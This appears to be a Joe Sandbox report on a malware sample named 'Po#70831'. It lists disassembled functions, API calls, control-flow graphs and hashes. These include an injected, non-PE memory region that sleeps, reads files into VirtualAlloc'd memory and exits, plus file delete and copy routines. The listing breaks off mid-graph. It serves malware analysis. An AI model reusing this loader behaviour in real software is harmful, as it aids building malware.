                                      • __dosmaperr.LIBCMT ref: 004D0776
                                      • GetFileType.KERNELBASE(00000000), ref: 004D0782
                                      • GetLastError.KERNEL32 ref: 004D078C
                                      • __dosmaperr.LIBCMT ref: 004D0795
                                      • CloseHandle.KERNEL32(00000000), ref: 004D07B5
                                      • CloseHandle.KERNEL32(?), ref: 004D08FF
                                      • GetLastError.KERNEL32 ref: 004D0931
                                      • __dosmaperr.LIBCMT ref: 004D0938
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175
                                      • Opcode ID: 8a265eaf50bcbd7ae1f351009828b853402f9035619906a7a0a7decdd1e66088
                                      • Instruction ID: 2fb1fc8693ad3658f5fd0471f4c69f056cc05a9b87f4a176c8f7dcd8fdf853c0
                                      • Opcode Fuzzy Hash: 8a265eaf50bcbd7ae1f351009828b853402f9035619906a7a0a7decdd1e66088
                                      • Instruction Fuzzy Hash: E1A12232A001049FDF29EF68D861BAE7BA0AB06324F14015FF8159F3D2D7799817DB99
                                      Function 0049344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00493A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00561418,?,00492E7F,?,?,?,00000000), ref: 00493A78
                                        • Part of subcall function 00493357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00493379
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0049356A
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004D318D
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004D31CE
                                      • RegCloseKey.ADVAPI32(?), ref: 004D3210
                                      • _wcslen.LIBCMT ref: 004D3277
                                      • _wcslen.LIBCMT ref: 004D3286
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                      • API String ID: 98802146-2727554177
                                      • Opcode ID: 76bf18b6e79714c9f4d995fc6209a28b854a27192624b4bfde28a73c6c61adae
                                      • Instruction ID: e4d9a2602c34b5dc3ce7512f1d6bdd9f1023605ed573cd7ae81955665ae1a801
                                      • Opcode Fuzzy Hash: 76bf18b6e79714c9f4d995fc6209a28b854a27192624b4bfde28a73c6c61adae
                                      • Instruction Fuzzy Hash: 227190716047019EC714EF6ADC8185BBBE8FFA5344F40082FF445832A1EB789A49DB56
                                      Function 00492B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00492B8E
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00492B9D
                                      • LoadIconW.USER32(00000063), ref: 00492BB3
                                      • LoadIconW.USER32(000000A4), ref: 00492BC5
                                      • LoadIconW.USER32(000000A2), ref: 00492BD7
                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00492BEF
                                      • RegisterClassExW.USER32(?), ref: 00492C40
                                        • Part of subcall function 00492CD4: GetSysColorBrush.USER32(0000000F), ref: 00492D07
                                        • Part of subcall function 00492CD4: RegisterClassExW.USER32(00000030), ref: 00492D31
                                        • Part of subcall function 00492CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00492D42
                                        • Part of subcall function 00492CD4: InitCommonControlsEx.COMCTL32(?), ref: 00492D5F
                                        • Part of subcall function 00492CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00492D6F
                                        • Part of subcall function 00492CD4: LoadIconW.USER32(000000A9), ref: 00492D85
                                        • Part of subcall function 00492CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00492D94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: 95b2b919c79bda6be3126e12ac64f0a70a6ea2679c3b63eea0af1418004e365e
                                      • Instruction ID: d3eaef24d22b5e0b0560521199cb7e8531f1a9b273b313765728dcf277b38336
                                      • Opcode Fuzzy Hash: 95b2b919c79bda6be3126e12ac64f0a70a6ea2679c3b63eea0af1418004e365e
                                      • Instruction Fuzzy Hash: 79213A70E10714ABDB109FA9EC45AAD7FB4FB18B50F08042BE501A77A0D7F10548EF98
                                      Function 0049B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 0049BB4E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID: p#V$p#V$p#V$p#V$p%V$p%V$x#V$x#V
                                      • API String ID: 1385522511-1690925405
                                      • Opcode ID: 763bce8b31c13b812c96e734418f228721387650f47e5eb5623159f979fc9f61
                                      • Instruction ID: 9f76af5d369c196100f4fe0c5c829395dddc41707136282b472e6bcc040d809d
                                      • Opcode Fuzzy Hash: 763bce8b31c13b812c96e734418f228721387650f47e5eb5623159f979fc9f61
                                      • Instruction Fuzzy Hash: A332AF70A00249DFDF20CF55D994ABABBB5EF44304F14806BE915AB351C7BCAD82CB99
                                      Function 00493170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 758 493170-493185 759 4931e5-4931e7 758->759 760 493187-49318a 758->760 759->760 761 4931e9 759->761 762 4931eb 760->762 763 49318c-493193 760->763 764 4931d0-4931d8 DefWindowProcW 761->764 765 4d2dfb-4d2e23 call 4918e2 call 4ae499 762->765 766 4931f1-4931f6 762->766 767 493199-49319e 763->767 768 493265-49326d PostQuitMessage 763->768 769 4931de-4931e4 764->769 801 4d2e28-4d2e2f 765->801 771 4931f8-4931fb 766->771 772 49321d-493244 SetTimer RegisterWindowMessageW 766->772 774 4d2e7c-4d2e90 call 4fbf30 767->774 775 4931a4-4931a8 767->775 770 493219-49321b 768->770 770->769 777 4d2d9c-4d2d9f 771->777 778 493201-493214 KillTimer call 4930f2 call 493c50 771->778 772->770 780 493246-493251 CreatePopupMenu 772->780 774->770 794 4d2e96 774->794 781 4d2e68-4d2e77 call 4fc161 775->781 782 4931ae-4931b3 775->782 786 4d2dd7-4d2df6 MoveWindow 777->786 787 4d2da1-4d2da5 777->787 778->770 780->770 781->770 783 4d2e4d-4d2e54 782->783 784 4931b9-4931be 782->784 783->764 797 4d2e5a-4d2e63 call 4f0ad7 783->797 792 493253-493263 call 49326f 784->792 793 4931c4-4931ca 784->793 786->770 795 4d2da7-4d2daa 787->795 796 4d2dc6-4d2dd2 SetFocus 787->796 792->770 793->764 793->801 794->764 795->793 802 4d2db0-4d2dc1 call 4918e2 795->802 796->770 797->764 801->764 806 4d2e35-4d2e48 call 4930f2 call 493837 801->806 802->770 806->764
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0049316A,?,?), ref: 004931D8
                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,0049316A,?,?), ref: 00493204
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00493227
                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0049316A,?,?), ref: 00493232
                                      • CreatePopupMenu.USER32 ref: 00493246
                                      • PostQuitMessage.USER32(00000000), ref: 00493267
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      • Opcode ID: d59cbaceb22662279bf0969e3f7fb514fe12bb3f175c666726ca323651763098
                                      • Instruction ID: a0ebb47d8794c3faed32b5995047910cfa436fe081977f7b1c9fef6718acdd21
                                      • Opcode Fuzzy Hash: d59cbaceb22662279bf0969e3f7fb514fe12bb3f175c666726ca323651763098
                                      • Instruction Fuzzy Hash: 2B412A3120460466DF245FB89D1AB7E3E55EB27306F0C053BF513873B1CBA89E45A6AE
                                      Function 0049DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: D%V$D%V$D%V$D%V$D%VD%V$Variable must be of type 'Object'.
                                      • API String ID: 0-4149449166
                                      • Opcode ID: 15bc4bc7eabf0b0226a5d89e41cfafaa75d8471a87d158944acf419f7f2293c6
                                      • Instruction ID: 9fb264121ca49c4d6724e723c0986bef1671be4349034fd0101f840e0f9f36de
                                      • Opcode Fuzzy Hash: 15bc4bc7eabf0b0226a5d89e41cfafaa75d8471a87d158944acf419f7f2293c6
                                      • Instruction Fuzzy Hash: E3C2A271A00214CFCF24CF9AC884AAEBBF1BF15315F24856AE906AB351D379ED41CB59
                                      Function 036D25F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1324 36d25f0-36d269e call 36d0000 1327 36d26a5-36d26cb call 36d3500 CreateFileW 1324->1327 1330 36d26cd 1327->1330 1331 36d26d2-36d26e2 1327->1331 1332 36d281d-36d2821 1330->1332 1338 36d26e9-36d2703 VirtualAlloc 1331->1338 1339 36d26e4 1331->1339 1334 36d2863-36d2866 1332->1334 1335 36d2823-36d2827 1332->1335 1340 36d2869-36d2870 1334->1340 1336 36d2829-36d282c 1335->1336 1337 36d2833-36d2837 1335->1337 1336->1337 1341 36d2839-36d2843 1337->1341 1342 36d2847-36d284b 1337->1342 1343 36d270a-36d2721 ReadFile 1338->1343 1344 36d2705 1338->1344 1339->1332 1345 36d28c5-36d28da 1340->1345 1346 36d2872-36d287d 1340->1346 1341->1342 1349 36d284d-36d2857 1342->1349 1350 36d285b 1342->1350 1351 36d2728-36d2768 VirtualAlloc 1343->1351 1352 36d2723 1343->1352 1344->1332 1347 36d28dc-36d28e7 VirtualFree 1345->1347 1348 36d28ea-36d28f2 1345->1348 1353 36d287f 1346->1353 1354 36d2881-36d288d 1346->1354 1347->1348 1349->1350 1350->1334 1355 36d276f-36d278a call 36d3750 1351->1355 1356 36d276a 1351->1356 1352->1332 1353->1345 1357 36d288f-36d289f 1354->1357 1358 36d28a1-36d28ad 1354->1358 1364 36d2795-36d279f 1355->1364 1356->1332 1359 36d28c3 1357->1359 1360 36d28af-36d28b8 1358->1360 1361 36d28ba-36d28c0 1358->1361 1359->1340 1360->1359 1361->1359 1365 36d27a1-36d27d0 call 36d3750 1364->1365 1366 36d27d2-36d27e6 call 36d3560 1364->1366 1365->1364 1372 36d27e8 1366->1372 1373 36d27ea-36d27ee 1366->1373 1372->1332 1374 36d27fa-36d27fe 1373->1374 1375 36d27f0-36d27f4 FindCloseChangeNotification 1373->1375 1376 36d280e-36d2817 1374->1376 1377 36d2800-36d280b VirtualFree 1374->1377 1375->1374 1376->1327 1376->1332 1377->1376
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 036D26C1
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 036D28E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2377113128.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_36d0000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0
                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                      • Instruction ID: 3eaabfa30c4970395035ec41dabdcf1e69f79edbfa2e59f678c23d6faf0f7f2a
                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                      • Instruction Fuzzy Hash: C4A12874E00208EBDB14CFA4C9A8BEEB7B5FF48704F208599E111BB280D7759A85CF94
                                      Function 00492C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1388 492c63-492cd3 CreateWindowExW * 2 ShowWindow * 2
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00492C91
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00492CB2
                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00491CAD,?), ref: 00492CC6
                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00491CAD,?), ref: 00492CCF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: e2863f720e6a66e2a1038635c7ee489ecc0aef720ab07c9ee0c46871578dc23b
                                      • Instruction ID: 997ca011569fadcdd9a7c695d87eaffac2a47c46ec0097a8334954a336d2b891
                                      • Opcode Fuzzy Hash: e2863f720e6a66e2a1038635c7ee489ecc0aef720ab07c9ee0c46871578dc23b
                                      • Instruction Fuzzy Hash: 07F054756406907AE770071BAC08E7B3EBDDBDBF50F08041DF901932A0C6B11849FAB4
                                      Function 036D23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1503 36d23b0-36d24ed call 36d0000 call 36d22a0 CreateFileW 1510 36d24ef 1503->1510 1511 36d24f4-36d2504 1503->1511 1512 36d25a4-36d25a9 1510->1512 1514 36d250b-36d2525 VirtualAlloc 1511->1514 1515 36d2506 1511->1515 1516 36d2529-36d2540 ReadFile 1514->1516 1517 36d2527 1514->1517 1515->1512 1518 36d2544-36d257e call 36d22e0 call 36d12a0 1516->1518 1519 36d2542 1516->1519 1517->1512 1524 36d259a-36d25a2 ExitProcess 1518->1524 1525 36d2580-36d2595 call 36d2330 1518->1525 1519->1512 1524->1512 1525->1524
                                      APIs
                                        • Part of subcall function 036D22A0: Sleep.KERNELBASE(000001F4), ref: 036D22B1
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 036D24E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2377113128.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_36d0000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: 22LSKX34X1ZS7UF4T82G3BYZV
                                      • API String ID: 2694422964-2028676936
                                      • Opcode ID: 616c669f1efd37f512c7ee2d09f1dfbe94355e96607c067dbbe076dd1fa859d6
                                      • Instruction ID: 5a0a3bb09fad25f2badbef18dd034023dcbb1032a03e8109de47f1db03ada72d
                                      • Opcode Fuzzy Hash: 616c669f1efd37f512c7ee2d09f1dfbe94355e96607c067dbbe076dd1fa859d6
                                      • Instruction Fuzzy Hash: FB516230D04288DAEF11DBE4C864BDEBB78AF19304F044599E6497B2C1D7BA1B49CB65
                                      Function 00502947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1527 502947-5029b9 call 4d1f50 call 5025d6 call 4afe0b call 495722 call 50274e call 49511f call 4b5232 1542 502a6c-502a73 call 502e66 1527->1542 1543 5029bf-5029c6 call 502e66 1527->1543 1548 502a75-502a77 1542->1548 1549 502a7c 1542->1549 1543->1548 1550 5029cc-502a6a call 4bd583 call 4b4983 call 4b9038 call 4bd583 call 4b9038 * 2 1543->1550 1551 502cb6-502cb7 1548->1551 1553 502a7f-502b3a call 4950f5 * 8 call 503017 call 4be5eb 1549->1553 1550->1553 1555 502cd5-502cdb 1551->1555 1592 502b43-502b5e call 502792 1553->1592 1593 502b3c-502b3e 1553->1593 1559 502cf0-502cf6 1555->1559 1560 502cdd-502ced call 4afdcd call 4afe14 1555->1560 1560->1559 1596 502bf0-502bfc call 4be678 1592->1596 1597 502b64-502b6c 1592->1597 1593->1551 1604 502c12-502c16 1596->1604 1605 502bfe-502c0d DeleteFileW 1596->1605 1598 502b74 1597->1598 1599 502b6e-502b72 1597->1599 1601 502b79-502b97 call 4950f5 1598->1601 1599->1601 1611 502bc1-502bd7 call 50211d call 4bdbb3 1601->1611 1612 502b99-502b9e 1601->1612 1607 502c91-502ca5 CopyFileW 1604->1607 1608 502c18-502c7e call 5025d6 call 4bd2eb * 2 call 5022ce 1604->1608 1605->1551 1609 502ca7-502cb4 DeleteFileW 1607->1609 1610 502cb9-502ccf DeleteFileW call 502fd8 1607->1610 1608->1610 1632 502c80-502c8f DeleteFileW 1608->1632 1609->1551 1621 502cd4 1610->1621 1627 502bdc-502be7 1611->1627 1617 502ba1-502bb4 call 5028d2 1612->1617 1625 502bb6-502bbf 1617->1625 1621->1555 1625->1611 1627->1597 1629 502bed 1627->1629 1629->1596 1632->1551
                                      APIs
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00502C05
                                      • DeleteFileW.KERNEL32(?), ref: 00502C87
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00502C9D
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00502CAE
                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00502CC0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: File$Delete$Copy
                                      • String ID:
                                      • API String ID: 3226157194-0
                                      • Opcode ID: d212e516231399eb32f03720b119baaf11ab14ac1c2780aea2940cff07d77a41
                                      • Instruction ID: 9ea0a122d01245ef10d930dc8e5f09a79134309c9c9e2eaffa3e3dfb4212c7e3
                                      • Opcode Fuzzy Hash: d212e516231399eb32f03720b119baaf11ab14ac1c2780aea2940cff07d77a41
                                      • Instruction Fuzzy Hash: 99B17F71D00119ABDF21DBA5CC89EDEBB7DFF49354F1040AAFA09E6181EA349E448F64
                                      Function 004C5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1907 4c5aa9-4c5ace 1908 4c5ad7-4c5ad9 1907->1908 1909 4c5ad0-4c5ad2 1907->1909 1911 4c5afa-4c5b1f 1908->1911 1912 4c5adb-4c5af5 call 4bf2c6 call 4bf2d9 call 4c27ec 1908->1912 1910 4c5ca5-4c5cb4 call 4b0a8c 1909->1910 1913 4c5b26-4c5b2c 1911->1913 1914 4c5b21-4c5b24 1911->1914 1912->1910 1918 4c5b2e-4c5b46 call 4bf2c6 call 4bf2d9 call 4c27ec 1913->1918 1919 4c5b4b 1913->1919 1914->1913 1917 4c5b4e-4c5b53 1914->1917 1923 4c5b64-4c5b6d call 4c564e 1917->1923 1924 4c5b55-4c5b61 call 4c9424 1917->1924 1956 4c5c9c-4c5c9f 1918->1956 1919->1917 1935 4c5b6f-4c5b71 1923->1935 1936 4c5ba8-4c5bba 1923->1936 1924->1923 1938 4c5b95-4c5b9e call 4c542e 1935->1938 1939 4c5b73-4c5b78 1935->1939 1941 4c5bbc-4c5bc2 1936->1941 1942 4c5c02-4c5c23 WriteFile 1936->1942 1955 4c5ba3-4c5ba6 1938->1955 1943 4c5c6c-4c5c7e 1939->1943 1944 4c5b7e-4c5b8b call 4c55e1 1939->1944 1949 4c5bc4-4c5bc7 1941->1949 1950 4c5bf2-4c5c00 call 4c56c4 1941->1950 1947 4c5c2e 1942->1947 1948 4c5c25-4c5c2b GetLastError 1942->1948 1953 4c5c89-4c5c99 call 4bf2d9 call 4bf2c6 1943->1953 1954 4c5c80-4c5c83 1943->1954 1967 4c5b8e-4c5b90 1944->1967 1957 4c5c31-4c5c3c 1947->1957 1948->1947 1958 4c5bc9-4c5bcc 1949->1958 1959 